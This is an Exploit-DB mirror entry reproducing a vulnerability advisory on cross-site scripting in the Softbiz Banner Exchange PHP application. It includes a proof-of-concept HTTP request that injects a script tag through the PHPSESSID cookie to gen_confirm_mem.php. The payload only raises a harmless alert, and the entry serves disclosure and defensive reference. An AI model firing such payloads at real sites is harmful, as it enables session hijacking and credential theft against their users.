exploit-db-mirror/exploits/php/webapps/28139.txt
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

10 lines
No EOL
658 B
Text

source: https://www.securityfocus.com/bid/18735/info
Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
GET http://www.example.com:80/gen_confirm_mem.php HTTP/1.0
Accept: */*
Host: www.example.com
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>